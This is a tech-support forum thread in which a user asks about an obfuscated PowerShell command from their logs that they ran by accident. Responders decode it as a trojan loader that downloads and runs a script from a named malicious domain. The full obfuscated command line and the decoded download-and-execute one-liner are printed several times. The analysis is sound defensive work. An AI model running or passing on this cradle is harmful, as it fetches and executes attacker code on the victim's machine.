locked
Please help to understand command RRS feed

  • Question

  • Could you please help me understand this line?

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP  . ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116

    Sunday, November 11, 2018 3:30 PM

All replies

  • It is just pointless nonsense that look like part of a malware attempt to execute some piece of code but the commandline is horribly broken.


    \_(ツ)_/


    • Edited by jrv Sunday, November 11, 2018 3:40 PM
    Sunday, November 11, 2018 3:38 PM
  • I'm sorry, I did not post whole line, here it is:

    \System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP . ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116 ,145 ,164,56 , 127, 145, 142,103, 154 ,151, 145 , 156 ,164 ,51 , 51 , 56 , 104, 157 , 167 , 156,154 , 157 , 141 ,144, 123 ,164, 162,151 ,156, 147,50,47,150 , 164 ,164,160,72 ,57 ,57,172 ,166 , 142 ,56 , 165,163 ,57, 61,47,51 ,73 ,111,105 , 130,40 , 44 , 141,163, 160 , 170)| ForeACh{( [CHAR] ([ConveRt]::TOiNt16( ( [stRing]$_) ,8 ) ))} )) EngineVersion=5.1.15063.1387 RunspaceId=55df57fe-ca17-4a46-9b64-33d7e9fed2e4 PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine=

    Sunday, November 11, 2018 3:56 PM
  • Still junk and an attempt at malware.  It could also be a mistake by someone who doesn't know PowerShell.


    \_(ツ)_/

    Sunday, November 11, 2018 4:06 PM
  • Looks like it's trying to run Internet Explorer, visit a web site at zvb.us, and download (and maybe run) a file.

    It's still a broken command line, though.


    --- Rich Matheisen MCSE&I, Exchange Ex-MVP (16 years)

    Sunday, November 11, 2018 4:19 PM
  • PS D:\scripts>  ( $pshOmE[4]+$PShoMe[30]+'X')
    ieX
    PS D:\scripts> Get-Alias ( $pshOmE[4]+$PShoMe[30]+'X')
    
    CommandType     Name                                               Version    Source
    -----------     ----                                               -------    ------
    Alias           iex -> Invoke-Expression
    
    
    PS D:\scripts>


    \_(ツ)_/

    Sunday, November 11, 2018 4:21 PM
  • The code is designed to download a uuencoded string and execute it.  It is a trojan.

    PS D:\scripts>             (
    >>                 -JoiN(
    >>                     (44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116,145 ,164,56 ,
     127, 145, 142,103, 154 ,151, 145 , 156 ,164 ,51 , 51 , 56 , 104, 157 , 167 , 156,154 , 157 , 141 ,144, 123 ,164, 162,151 ,156, 147,50,47,150 , 164 ,164,160,72 ,57 ,57,172
    ,166 , 142 ,56 , 165,163 ,57, 61,47,51 ,73 ,111,105 , 130,40 , 44 , 141,163,160 , 170) |
    >>                     ForeACh{
    >>                             ( [CHAR] ([ConveRt]::TOiNt16( ( [stRing]$_) ,8 ) ))
    >>                     }
    >>                 )
    >>             )
    $aspx = ((New-Object System.Net.WebClient)).DownloadString('http://zvb.us/1');IEX $aspx
    PS D:\scripts>
    The encoded string is huge and is likely a script that runs system utilities to find security holes.  This thing may download more elements as needed. 


    \_(ツ)_/


    Sunday, November 11, 2018 4:28 PM
  • $aspx = ((New-Object System.Net.WebClient)).DownloadString('http://zvb.us/1')
    PS D:\scripts> $aspx.length
    111856
    

    The string is decrypted with its own descriptor at the end of the string.

    At the end of $aspx it decodes and executes iex again.

    The end"EngineVersion=5.1.15063.1387 RunspaceId=55df57fe-ca17-4a46-9b64-33d7e9fed2e4 PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine= "

    Seems to have nothing to do with the rest of this and it is also missing the executer.


    \_(ツ)_/

    Sunday, November 11, 2018 4:39 PM
  • My situation is that i accidentally executed this mallware thing (only once), and now i'm trying to figure out what damage has been done. I've found this logs from powershell, I hope there's something useful there.

    Log Name:      Windows PowerShell
    Source:        PowerShell
    Date:          11-Nov-18 5:29:40 PM
    Event ID:      600
    Task Category: Provider Lifecycle
    Level:         Information
    Keywords:      Classic
    User:          N/A
    Computer:      Notebook
    Description:
    Provider "Registry" is Started.

    Details:
        ProviderName=Registry
        NewProviderState=Started

        SequenceNumber=1

        HostName=ConsoleHost
        HostVersion=5.1.15063.1387
        HostId=cc7abe6f-5592-4551-81a5-05e3a877021a
        HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP . ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116 ,145 ,164,56 , 127, 145, 142,103, 154 ,151, 145 , 156 ,164 ,51 , 51 , 56 , 104, 157 , 167 , 156,154 , 157 , 141 ,144, 123 ,164, 162,151 ,156, 147,50,47,150 , 164 ,164,160,72 ,57 ,57,172 ,166 , 142 ,56 , 165,163 ,57, 61,47,51 ,73 ,111,105 , 130,40 , 44 , 141,163, 160 , 170)| ForeACh{( [CHAR] ([ConveRt]::TOiNt16( ( [stRing]$_) ,8 ) ))} ))
        EngineVersion=
        RunspaceId=
        PipelineId=
        CommandName=
        CommandType=
        ScriptName=
        CommandPath=
        CommandLine=



    • Edited by Tappy1987 Sunday, November 11, 2018 6:07 PM
    • Edited by jrv Sunday, November 11, 2018 6:07 PM Unnecessary redundancy
    Sunday, November 11, 2018 6:04 PM
  • Contact your AV vendor and have them look at it.

    This is not the correct forum for this kind of issue.  It is something that the AV software should catch.


    \_(ツ)_/

    Sunday, November 11, 2018 6:09 PM
  • Yeah, I scanned my PC with AV software and adwcleaner, and they've found nothing, I think i'd better clean my pc to be sure, thanks for the help.

    Sunday, November 11, 2018 6:15 PM
  • If the AV didn't find it then it will not be cleaned.  The encoded string has a built in decode and then it is executed.  It is a bStr so it is likely scrpt and not binary.  I suspect there is another download that is a binary that gets installed and that is not being detected.  Let the AV guys see it to see if they can detect what is really being installed.  You won't find it.


    \_(ツ)_/

    Sunday, November 11, 2018 6:27 PM
  • It's a bit of code:

    $aspx = ((New-Object System.Net.WebClient)).DownloadString('http://XXX.us/1');IEX $aspx

    The "xxx.us" was "zvb.us" in the original. It didn't feel right leaving the original site in an executable bit of code. See here:

    http://trafficlight.bitdefender.com/info?url=http://zvb.us


    --- Rich Matheisen MCSE&I, Exchange Ex-MVP (16 years)

    Sunday, November 11, 2018 7:56 PM
  • Yes. That web domain is a hacker domain. It show up everywhere.  It has a long history.

    It seems to be just a site where any hacker can create a page and park malware on it. This time the page is "1".


    \_(ツ)_/

    Sunday, November 11, 2018 8:00 PM
  • Hi,

    Was your issue resolved?

    If you resolved it using our solution, please "mark it as answer" to help other community members find the helpful reply quickly.

    If you resolve it using your own solution, please share your experience and solution here. It will be very beneficial for other community members who have similar questions.

    If no, please reply and tell us the current situation in order to provide further help.

    Best Regards,

    Lee


    Just do it.

    Tuesday, November 27, 2018 2:26 AM
  • Hi,

    Was your issue resolved?

    If you resolved it using our solution, please "mark it as answer" to help other community members find the helpful reply quickly.

    If you resolve it using your own solution, please share your experience and solution here. It will be very beneficial for other community members who have similar questions.

    If no, please reply and tell us the current situation in order to provide further help.

    Best Regards,

    Lee


    Just do it.

    Tuesday, December 4, 2018 3:07 AM